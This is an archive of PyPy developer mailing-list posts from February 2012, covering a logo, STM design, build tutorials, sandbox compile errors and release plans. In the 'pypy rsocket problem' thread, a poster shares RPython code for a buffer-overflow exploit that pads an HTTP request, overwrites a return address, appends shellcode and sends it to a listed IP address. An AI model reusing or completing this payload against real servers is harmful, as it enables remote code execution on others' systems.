From fmalina at gmail.com Wed Feb 1 02:22:48 2012 From: fmalina at gmail.com (F Malina) Date: Wed, 1 Feb 2012 01:22:48 +0000 Subject: [pypy-dev] Logo design Message-ID: Hi, Apology first as this took me a while to post here, I was launching a new site. As per fijal's request I am posting a logotype here for consideration. SVG - https://www.flatmaterooms.co.uk/ultranet/snakey-v3.2-shadow.svg ZIP archive -?https://www.flatmaterooms.co.uk/ultranet/snakey.zip (Comes with 3-color for plotter and shadowed for print and web use, Adobe Illustrator and Inkscape compatible SVG and PDF) More context - https://www.flatmaterooms.co.uk/ultranet/google.html Regarding font-choices, the current one could be used but I am also a big fan of downgrading to plain Arial Black, which could be used in the same position or justified to the width of the logotype below the graphic with appropriate white-space and grid position e.g. half the height of text. All vectors are a hand drawn interpretation and artwork hereby declared CC share-alike licensed just as the current logo, although I would like the profit from merchandise using the graphics such as t-shirts or mugs to go towards pypy development. Kind regards, Frank http://www.flatmaterooms.co.uk From andrewfr_ice at yahoo.com Wed Feb 1 19:05:25 2012 From: andrewfr_ice at yahoo.com (Andrew Francis) Date: Wed, 1 Feb 2012 10:05:25 -0800 (PST) Subject: [pypy-dev] Question about the STM module and RSTM In-Reply-To: References: <1327954833.79806.YahooMailNeo@web120704.mail.ne1.yahoo.com> Message-ID: <1328119525.65032.YahooMailNeo@web120705.mail.ne1.yahoo.com> Hi Armin: ________________________________ From: Armin Rigo To: Andrew Francis Cc: Py Py Developer Mailing List Sent: Monday, January 30, 2012 3:46 PM Subject: Re: [pypy-dev] Question about the STM module and RSTM >You wouldn't be able to write pure Python versions of classical STM >examples, because the "transaction" module works at a level different >from most STM implementations.? You can try to write RPython versions >of them, just for fun, but they may break at a moment's notice. I would still be interested in writing RPython and Stackless versions. >In PyPy, we look at STM like we would look at the GC.? It may be >replaced in a week by a different one, but for the "end user" writing >pure Python code, it essentially doesn't make a difference.? That's >why we have no plan at all to let the user access all the details of >the STM library.? Even the fact that STM is used is almost an >implementation detail, which has just a few visible consequences >(similar to how the very old versions of Python had a GC based on >refcounting alone, which didn't free loops). Perhaps one reason you would want to exposure the STM module is for other language implementations that could use STM? An example. My interest in Stackless Python and PyPy (via stackless.py) came out of wanting to develop a WS-BPEL processor. My initial approach was to write a WS-BPEL to Python pre-processor. PyPy would allow me to write a WS-BPEL processor in ways I couldn't imagine a few years ago. I'm on the fence about WS-BPEL these days. As for your approach. Like a lot of people on the blog, it is not the way I understood STM to work. For me this is because Haskell is the only approach I've seen. Reading papers has exposed me to more ideas.? I have been reading the text "Transactional Memory, 2nd (2010)" by Harris, Larus, and Rajawar. In one of the sections, they describe an approach called "Transactions Everywhere." Assumption is that transactions are the norm, not the exception. So atomicity is the default. Connected to that is TM based on Automatic Mutual Exclusion (or AME). Roughly, AME is a cooperative multi-threading system that is build over STM. Perhaps this is helpful, you can read the paper "Automatic Mutual Exclusion" (http://research.microsoft.com/en-us/projects/ame/automutex-hotos.pdf) or look at other papers at the site. Salut, Andrew -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Wed Feb 1 21:36:18 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 1 Feb 2012 21:36:18 +0100 Subject: [pypy-dev] Question about the STM module and RSTM In-Reply-To: <1328119525.65032.YahooMailNeo@web120705.mail.ne1.yahoo.com> References: <1327954833.79806.YahooMailNeo@web120704.mail.ne1.yahoo.com> <1328119525.65032.YahooMailNeo@web120705.mail.ne1.yahoo.com> Message-ID: Hi Andrew, On Wed, Feb 1, 2012 at 19:05, Andrew Francis wrote: > Perhaps this is helpful, you can read the paper "Automatic Mutual Exclusion" > (http://research.microsoft.com/en-us/projects/ame/automutex-hotos.pdf) or > look at other papers at the site. Thank you a lot for this reference! This paper describes exactly the same thing as I'm trying to. It's this kind of usage of transactional memory that I'm interested in. A bient?t, Armin. From andrew.rustytub at gmail.com Sun Feb 5 03:49:12 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 18:49:12 -0800 Subject: [pypy-dev] Compiling using translate [a small tutorial] Message-ID: I thought I would post a small tutorial on using translate.py to compile pypy RPython scripts This tutorial is about how to compile python standalone executables using RPYTHON. RPython is a restricted subset of of python RPython (Restricted Python) is statically typed What will we cover in this tutorial is setting up an environment for building src code in RPython First you will need to download PyPy and MinGW (the pypy translator is only available in the source of PyPy we will need translate.py later to compile the executable. So get the latest source using Mercurial) Download Mercurial here *http://mercurial.selenic.com* and install it. Using Mercurial run this command from your cmd prompt *hg clone* *https://bitbucket.org/pypy/pypy* Now you will have PyPy downloaded. I just moved it to the directory C:\pypy for easy reference. Next we will add an Environment Variable to the directory containing translate.py it should be in C:\pypy\pypy\translator\goal\ the file translate.py will be in this goal directory Now you will need to install MinGW * http://sourceforge.net/projects/mingw/files/Automated%20MinGW%20Installer/mingw-get-inst/ * Installing the C++ compiler and the MSYS tools also Add the bin directory of MinGW to your path as well as \msys\1.0\bin; So if you installed MinGW to to C:\MinGW it would be C:\MinGW\bin and C:\MinGW\msys\1.0\bin; You will need to use MinGW to compile a dll before we can start. This is so we can use CTYPES as well MinGW will be our compiler for RPython Now download the libffi source *http://sourceware.org/libffi/* once again this will allow for CTYPES in PyPy and MingW cd to the libffi source directory (you just downloaded) extract it and type * sh ./configure make* this will create a dll in .libs in the directory where you extracted the libffi srcs. The dll will be called: *libffi-5.dll * Next add this to a folder on your C drive and add it to your Environment Variable/Path Now you should be able to compile source using *translate.py --cc=mingw32 --output test.exe test.py * Obviously changing directories to where your script is. This was really only to be a reference for me. I wrote this originally as a reference for myself last year but I imagine some one can use it *cheers Andrew -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew.rustytub at gmail.com Sun Feb 5 04:18:42 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 19:18:42 -0800 Subject: [pypy-dev] pypy rsocket problem Message-ID: Hello I started developing a small exploit framework in Python about a year ago. I will be honest I did not get very far due to lack of commitment. But I wish to start on this project again, my idea is simple I want to write this in PyPy using RPython and be able to compile the exploits into executables. So far with help from this mailing list I have been able to compile local_exploits (ones that do not take advantage of any networking) and I am now working towards developing a network based one as a trial. I like to test the water before I jump in However I am having troubles compiling this one and am unsure how to diagnose any errors and would appreciate any advice any of you have to offer. Below is my code I removed the shell code if you wish me to post all of it please respond with that from pypy.rlib import rsocket from pypy.rpython.lltypesystem import lltype from pypy.rpython.lltypesystem import rffi def main(argv): PORT = 8080 JUNK = "A" ret = "\x67\x42\xa7\x71" mycode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") request = "GET /" for i in range(776): request = request + JUNK request = request + ret request = request + mycode request = request + " HTTP/1.1" request = request + "\r\n" ptr = rffi.str2charp(mycode) # returns a "char*" pointer print ptr print len(request) s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) target = rsocket.INETAddress("85.25.149.220", 8080) s.connect(target) s.send((ptr, len(request), 0)) return 0 def target(*args): return main, None *cheers -------------- next part -------------- An HTML attachment was scrubbed... URL: From pjenvey at underboss.org Sun Feb 5 05:42:20 2012 From: pjenvey at underboss.org (Philip Jenvey) Date: Sat, 4 Feb 2012 20:42:20 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: Message-ID: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> On Feb 4, 2012, at 7:18 PM, Andrew Evans wrote: > Hello I started developing a small exploit framework in Python about a year ago. I will be honest I did not get very far due to lack of commitment. But I wish to start on this project again, my idea is simple I want to write this in PyPy using RPython and be able to compile the exploits into executables. > > So far with help from this mailing list I have been able to compile local_exploits (ones that do not take advantage of any networking) and I am now working towards developing a network based one as a trial. I like to test the water before I jump in > > However I am having troubles compiling this one and am unsure how to diagnose any errors and would appreciate any advice any of you have to offer. > > Below is my code > > I removed the shell code if you wish me to post all of it please respond with that > > from pypy.rlib import rsocket > from pypy.rpython.lltypesystem import lltype > from pypy.rpython.lltypesystem import rffi > > def main(argv): > PORT = 8080 > JUNK = "A" > ret = "\x67\x42\xa7\x71" > mycode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") > > request = "GET /" > for i in range(776): > request = request + JUNK > request = request + ret > request = request + mycode > request = request + " HTTP/1.1" > request = request + "\r\n" > ptr = rffi.str2charp(mycode) # returns a "char*" pointer > print ptr > print len(request) > s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) > target = rsocket.INETAddress("85.25.149.220", 8080) > s.connect(target) > s.send((ptr, len(request), 0)) I'm not sure what you're doing with 'ptr' here but it seems like you just want s.send(request, 0) instead > return 0 > > def target(*args): > return main, None > > > *cheers > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev -- Philip Jenvey From andrew.rustytub at gmail.com Sun Feb 5 06:04:19 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 21:04:19 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> References: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> Message-ID: This is actually what I wanted to do with ptr, sorry I had to confirm with a friend of mine before posting again. The hex code should be cast to a CCHARP The problem I am facing is compiling using rsocket if I remove the send and connect and INETAddress bits it compiles but as soon as I add INETAddress it refuses to compile What should I be doing instead? *cheers def main(argv): PORT = 8080 JUNK = "A" ret = "\x67\x42\xa7\x71" hellcode = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") request = "GET /" for i in range(776): request = request + JUNK request = request + ret request = request + hellcode request = request + " HTTP/1.1" request = request + "\r\n" ptr = rffi.cast(rffi.CCHARP, hellcode) # returns a "char*" pointer #print ptr #print len(request) s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) target = rsocket.INETAddress("127.0.0.1", 8080) s.connect(target) s.send(ptr, len(request)) return 0 -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew.rustytub at gmail.com Sun Feb 5 06:27:50 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sat, 4 Feb 2012 21:27:50 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: <47ECC83F-1AC1-4E56-8A17-3947368D05A3@underboss.org> Message-ID: Sorry for all the messages I attached a log of what happens when I try to compile this *cheers -------------- next part -------------- An HTML attachment was scrubbed... URL: -------------- next part -------------- [translation:ERROR] Error: [translation:ERROR] Traceback (most recent call last): [translation:ERROR] File "C:\pypy\pypy\translator\goal\translate.py", line 30 9, in main [translation:ERROR] drv.proceed(goals) [translation:ERROR] File "C:\pypy\pypy\translator\driver.py", line 809, in pr oceed [translation:ERROR] return self._execute(goals, task_skip = self._maybe_skip ()) [translation:ERROR] File "C:\pypy\pypy\translator\tool\taskengine.py", line 1 16, in _execute [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) [translation:ERROR] File "C:\pypy\pypy\translator\driver.py", line 286, in _d o [translation:ERROR] res = func() [translation:ERROR] File "C:\pypy\pypy\translator\driver.py", line 323, in ta sk_annotate [translation:ERROR] s = annotator.build_types(self.entry_point, self.inputty pes) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 103, i n build_types [translation:ERROR] return self.build_graph_types(flowgraph, inputcells, com plete_now=complete_now) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 194, i n build_graph_types [translation:ERROR] self.complete() [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 250, i n complete [translation:ERROR] self.processblock(graph, block) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 448, i n processblock [translation:ERROR] self.flowin(graph, block) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 508, i n flowin [translation:ERROR] self.consider_op(block.operations[i]) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 710, i n consider_op [translation:ERROR] raise_nicer_exception(op, str(graph)) [translation:ERROR] File "C:\pypy\pypy\annotation\annrpython.py", line 707, i n consider_op [translation:ERROR] resultcell = consider_meth(*argcells) [translation:ERROR] File "<642-codegen C:\pypy\pypy\annotation\annrpython.py: 745>", line 3, in consider_op_simple_call [translation:ERROR] return arg.simple_call(*args) [translation:ERROR] File "C:\pypy\pypy\annotation\unaryop.py", line 175, in s imple_call [translation:ERROR] return obj.call(getbookkeeper().build_args("simple_call" , args_s)) [translation:ERROR] File "C:\pypy\pypy\annotation\unaryop.py", line 702, in c all [translation:ERROR] return bookkeeper.pbc_call(pbc, args) [translation:ERROR] File "C:\pypy\pypy\annotation\bookkeeper.py", line 667, i n pbc_call [translation:ERROR] results.append(desc.pycall(schedule, args, s_previous_re sult, op)) [translation:ERROR] File "C:\pypy\pypy\annotation\description.py", line 289, in pycall [translation:ERROR] result = self.specialize(inputcells, op) [translation:ERROR] File "C:\pypy\pypy\annotation\description.py", line 281, in specialize [translation:ERROR] enforceargs(self, inputcells) # can modify inputcells in -place [translation:ERROR] File "C:\pypy\pypy\annotation\signature.py", line 129, in __call__ [translation:ERROR] s_input = unionof(s_input, s_arg) [translation:ERROR] File "C:\pypy\pypy\annotation\model.py", line 695, in uni onof [translation:ERROR] s1 = pair(s1, s2).union() [translation:ERROR] File "C:\pypy\pypy\annotation\binaryop.py", line 903, in union [translation:ERROR] assert False, ("mixing pointer type %r with something el se %r" % (p.ll_ptrtype, obj)) [translation:ERROR] AssertionError': mixing pointer type <* Array of Char > wit h something else SomeString(can_be_None=False) [translation:ERROR] .. v0 = simple_call((function get_nonmovingbuffer), data _0) [translation:ERROR] .. '(pypy.rlib.rsocket:997)RSocket.send' [translation:ERROR] Processing block: [translation:ERROR] block at 9 is a [translation:ERROR] in (pypy.rlib.rsocket:997)RSocket.send [translation:ERROR] containing the following operations: [translation:ERROR] v0 = simple_call((function get_nonmovingbuffer), data _0) [translation:ERROR] v1 = getattr(self_0, ('send_raw')) [translation:ERROR] v2 = len(data_0) [translation:ERROR] v3 = simple_call(v1, v0, v2, flags_0) [translation:ERROR] --end-- [translation] start debugger... > c:\pypy\pypy\annotation\binaryop.py(903)union() -> assert False, ("mixing pointer type %r with something else %r" % (p.ll_ptrtyp e, obj)) From Ronny.Pfannschmidt at gmx.de Sun Feb 5 09:18:48 2012 From: Ronny.Pfannschmidt at gmx.de (Ronny Pfannschmidt) Date: Sun, 05 Feb 2012 09:18:48 +0100 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: Message-ID: <4F2E3B68.20506@gmx.de> why are you even using rpython for code, that?s clearly just composing some strings and sending them over a socket (i.e. strikingly app-level)? rpython is NOT indented for app-level development. On 02/05/12 04:18, Andrew Evans wrote: > Hello I started developing a small exploit framework in Python about a year > ago. I will be honest I did not get very far due to lack of commitment. But > I wish to start on this project again, my idea is simple I want to write > this in PyPy using RPython and be able to compile the exploits into > executables. > > So far with help from this mailing list I have been able to compile > local_exploits (ones that do not take advantage of any networking) and I am > now working towards developing a network based one as a trial. I like to > test the water before I jump in > > However I am having troubles compiling this one and am unsure how to > diagnose any errors and would appreciate any advice any of you have to > offer. > > Below is my code > > I removed the shell code if you wish me to post all of it please respond > with that > > from pypy.rlib import rsocket > from pypy.rpython.lltypesystem import lltype > from pypy.rpython.lltypesystem import rffi > > def main(argv): > PORT = 8080 > JUNK = "A" > ret = "\x67\x42\xa7\x71" > mycode = > ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49") > > request = "GET /" > for i in range(776): > request = request + JUNK > request = request + ret > request = request + mycode > request = request + " HTTP/1.1" > request = request + "\r\n" > ptr = rffi.str2charp(mycode) # returns a "char*" pointer > print ptr > print len(request) > s = rsocket.RSocket(rsocket.AF_INET, rsocket.SOCK_STREAM) > target = rsocket.INETAddress("85.25.149.220", 8080) > s.connect(target) > s.send((ptr, len(request), 0)) > return 0 > > def target(*args): > return main, None > > > *cheers > > > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 900 bytes Desc: OpenPGP digital signature URL: From arigo at tunes.org Sun Feb 5 10:12:06 2012 From: arigo at tunes.org (Armin Rigo) Date: Sun, 5 Feb 2012 10:12:06 +0100 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E3B68.20506@gmx.de> References: <4F2E3B68.20506@gmx.de> Message-ID: Hi Andrew, On Sun, Feb 5, 2012 at 09:18, Ronny Pfannschmidt wrote: > rpython is NOT indented for app-level development. Said more diplomatically: you can do whatever you want with RPython, but it was intended to be used to write interpreters for dynamic languages like Python or Prolog or experimental ones like Converge. Even so, I would recommend to first write at least the basics of the interpreter in pure Python, keeping only a (at first) vague idea that it should be RPython in the end. RPython was developed with this approach as a target. That is why you may or may not get an answer to your question on this mailing list. Instead, just use regular Python, and complain here or on https://bugs.pypy.org if the performance you get running on PyPy doesn't match your expectations. A bient?t, Armin. From bokr at oz.net Sun Feb 5 16:08:04 2012 From: bokr at oz.net (Bengt Richter) Date: Sun, 05 Feb 2012 07:08:04 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E3B68.20506@gmx.de> References: <4F2E3B68.20506@gmx.de> Message-ID: <4F2E9B54.3090501@oz.net> On 02/05/2012 12:18 AM Ronny Pfannschmidt wrote: > rpython is NOT indented for app-level development. Does indentation work differently in rpython? Regards, Bengt Richter Sorry, could not resist ;-) From andrew.rustytub at gmail.com Sun Feb 5 16:25:19 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sun, 5 Feb 2012 07:25:19 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: <4F2E9B54.3090501@oz.net> References: <4F2E3B68.20506@gmx.de> <4F2E9B54.3090501@oz.net> Message-ID: Oh I see no worries I don't have to use RPython, I did not realize it was primarily used for compilers. Primarily what I wanted to use it for was the translation into a (small) binary feature This intrigued me, but I see what your saying ;-) Thank you for the help I will continue to use Python rather than RPython for development *cheers -------------- next part -------------- An HTML attachment was scrubbed... URL: From andrew.rustytub at gmail.com Sun Feb 5 16:31:07 2012 From: andrew.rustytub at gmail.com (Andrew Evans) Date: Sun, 5 Feb 2012 07:31:07 -0800 Subject: [pypy-dev] pypy rsocket problem In-Reply-To: References: <4F2E3B68.20506@gmx.de> <4F2E9B54.3090501@oz.net> Message-ID: Correction I did not realize it was primarily used for interpreters Sorry its early On Sun, Feb 5, 2012 at 7:25 AM, Andrew Evans wrote: > Oh I see no worries I don't have to use RPython, I did not realize it was > primarily used for compilers. Primarily what I wanted to use it for was the > translation into a (small) binary feature > > This intrigued me, but I see what your saying ;-) > > Thank you for the help I will continue to use Python rather than RPython > for development > > *cheers > > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From ian at ianozsvald.com Mon Feb 6 02:44:57 2012 From: ian at ianozsvald.com (Ian Ozsvald) Date: Sun, 5 Feb 2012 22:44:57 -0300 Subject: [pypy-dev] Will PyPy 1.7 be the latest for PyCon, or maybe 1.8? Message-ID: Hi Fijal, Armin, Antonio. I'm re-running my High Performance Python tutorial (from EuroPython 2011) at PyCon this year (which makes me feel rather honoured). I've just downloaded PyPy 1.7 and I'm starting to test my code and make updates. I see a mention of PyPy 1.8 on the Downloads page - is there an estimate of the release date? I'm just curious about whether there's a plan to release it before PyCon. I can use the nightly builds but it'll be nice to reference the 'expected current' version of PyPy in the slides, if it is soon. Cheers (and congrats on all the progress, I'm looking forward to looking at numpypy), Ian. -- Ian Ozsvald (A.I. researcher) ian at IanOzsvald.com http://IanOzsvald.com http://MorConsulting.com/ http://StrongSteam.com/ http://SocialTiesApp.com/ http://TheScreencastingHandbook.com http://FivePoundApp.com/ http://twitter.com/IanOzsvald From fijall at gmail.com Mon Feb 6 08:58:15 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 09:58:15 +0200 Subject: [pypy-dev] Will PyPy 1.7 be the latest for PyCon, or maybe 1.8? In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 3:44 AM, Ian Ozsvald wrote: > Hi Fijal, Armin, Antonio. I'm re-running my High Performance Python > tutorial (from EuroPython 2011) at PyCon this year (which makes me > feel rather honoured). I've just downloaded PyPy 1.7 and I'm starting > to test my code and make updates. > > I see a mention of PyPy 1.8 on the Downloads page - is there an > estimate of the release date? I'm just curious about whether there's a > plan to release it before PyCon. I can use the nightly builds but > it'll be nice to reference the 'expected current' version of PyPy in > the slides, if it is soon. > > Cheers (and congrats on all the progress, I'm looking forward to > looking at numpypy), > Ian. Hey Ian. 1.8 should definitely be released before pycon. We're working on it. Cheers, fijal From kracethekingmaker at gmail.com Mon Feb 6 09:25:33 2012 From: kracethekingmaker at gmail.com (kracekumar ramaraju) Date: Mon, 6 Feb 2012 13:55:33 +0530 Subject: [pypy-dev] Unable to complete pypy sandboxing Message-ID: Hi pypy1.7 translate.py -O2 --sandbox targetpypystandalone.py pypy1.7 translate.py -O2 --sandbox I tried above commands separately, I ended up getting same error message [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: array subscript is above array bounds [-Warray-bounds] [translation:ERROR] debug_print.o: In function `pypy_read_timestamp': [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to `clock_gettime' [translation:ERROR] collect2: ld returned 1 exit status [translation:ERROR] make: *** [pypy-c] Error 1 [translation:ERROR] """) [translation] start debugger... > /home/kracekumar/codes/python/pypy/pypy/translator/platform/__init__.py(130)_handle_error() -> raise CompilationError(stdout, stderr) (Pdb+) exit Am I missing something in installation ? or my compilation technique is wrong ? -- * Thanks & Regards "Talk is cheap, show me the code" -- Linus Torvalds kracekumar www.kracekumar.com * -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 6 09:30:55 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 10:30:55 +0200 Subject: [pypy-dev] Unable to complete pypy sandboxing In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 10:25 AM, kracekumar ramaraju wrote: > Hi > > ? pypy1.7 translate.py -O2 --sandbox targetpypystandalone.py > ? pypy1.7 translate.py -O2 --sandbox > > I tried above commands separately, I ended up getting same error message > > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28289:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] interpreter_astcompiler_codegen.c:28548:53: warning: > array subscript is above array bounds [-Warray-bounds] > [translation:ERROR] debug_print.o: In function `pypy_read_timestamp': > [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to > `clock_gettime' > [translation:ERROR] collect2: ld returned 1 exit status > [translation:ERROR] make: *** [pypy-c] Error 1 > [translation:ERROR] """) > [translation] start debugger... >> >> /home/kracekumar/codes/python/pypy/pypy/translator/platform/__init__.py(130)_handle_error() > -> raise CompilationError(stdout, stderr) > (Pdb+) exit > > Am I missing something in installation ? or my compilation technique is > wrong ? > -- > Thanks & Regards > > "Talk is cheap, show me the code" -- Linus Torvalds > kracekumar > www.kracekumar.com > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > What's your operating system? Cheers, fijal From arigo at tunes.org Mon Feb 6 09:54:38 2012 From: arigo at tunes.org (Armin Rigo) Date: Mon, 6 Feb 2012 09:54:38 +0100 Subject: [pypy-dev] Unable to complete pypy sandboxing In-Reply-To: References: Message-ID: Hi, On Mon, Feb 6, 2012 at 09:25, kracekumar ramaraju wrote: > [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to > `clock_gettime' Your OS's include files define CLOCK_THREAD_CPUTIME_ID, but not clock_gettime(), which sounds strange. The issue is probably that the "-lrt" option to "ld" is missing. What OS is it? Also, what exact version of PyPy are you using? We fixed a few things here recently. A bient?t, Armin. From fijall at gmail.com Mon Feb 6 10:02:02 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 11:02:02 +0200 Subject: [pypy-dev] Unable to complete pypy sandboxing In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 10:54 AM, Armin Rigo wrote: > Hi, > > On Mon, Feb 6, 2012 at 09:25, kracekumar ramaraju > wrote: >> [translation:ERROR] debug_print.c:(.text+0x193): undefined reference to >> `clock_gettime' > > Your OS's include files define CLOCK_THREAD_CPUTIME_ID, but not > clock_gettime(), which sounds strange. ?The issue is probably that the > "-lrt" option to "ld" is missing. ?What OS is it? ?Also, what exact > version of PyPy are you using? ?We fixed a few things here recently. > > > A bient?t, > > Armin. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Ah, we just figured out you're using an old pypy. Try a new checkout and the issue should be fixed. Cheers, fijal From alex0player at gmail.com Mon Feb 6 16:06:43 2012 From: alex0player at gmail.com (Alexander Sedov) Date: Mon, 6 Feb 2012 19:06:43 +0400 Subject: [pypy-dev] Please, someone, send this patch Message-ID: Wasted two hours trying to get into IRC channel and post this. Please someone, commit this minor, useless patch. http://paste.pocoo.org/show/546747/ -------------- next part -------------- An HTML attachment was scrubbed... URL: From benjamin at python.org Mon Feb 6 16:07:24 2012 From: benjamin at python.org (Benjamin Peterson) Date: Mon, 6 Feb 2012 10:07:24 -0500 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: References: Message-ID: 2012/2/6 Alexander Sedov : > Wasted two hours trying to get into IRC channel and post this. Please > someone, commit this minor, useless patch. > http://paste.pocoo.org/show/546747/ If it's minor and useless, why should it go in? -- Regards, Benjamin From piotr.skamruk at gmail.com Mon Feb 6 16:49:06 2012 From: piotr.skamruk at gmail.com (Piotr Skamruk) Date: Mon, 6 Feb 2012 16:49:06 +0100 Subject: [pypy-dev] Please, someone, send this patch In-Reply-To: References: Message-ID: it fixes obvious typo, so it's not so useless... 2012/2/6 Benjamin Peterson : > 2012/2/6 Alexander Sedov : >> Wasted two hours trying to get into IRC channel and post this. Please >> someone, commit this minor, useless patch. >> http://paste.pocoo.org/show/546747/ > > If it's minor and useless, why should it go in? > > > > -- > Regards, > Benjamin > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev From tbaldridge at gmail.com Mon Feb 6 19:54:47 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Mon, 6 Feb 2012 12:54:47 -0600 Subject: [pypy-dev] Status of LLVM backend Message-ID: I haven't heard much about using PyPy with LLVM recently, and just wanted to know what the status of it was. Was there ever much of an improvement in using PyPy with LLVM for code generation? Does the binary install of PyPy use LLVM? Thanks for the info, Timothy -- ?One of the main causes of the fall of the Roman Empire was that?lacking zero?they had no way to indicate successful termination of their C programs.? (Robert Firth) From fijall at gmail.com Mon Feb 6 20:17:54 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 6 Feb 2012 21:17:54 +0200 Subject: [pypy-dev] Status of LLVM backend In-Reply-To: References: Message-ID: On Mon, Feb 6, 2012 at 8:54 PM, Timothy Baldridge wrote: > I haven't heard much about using PyPy with LLVM recently, 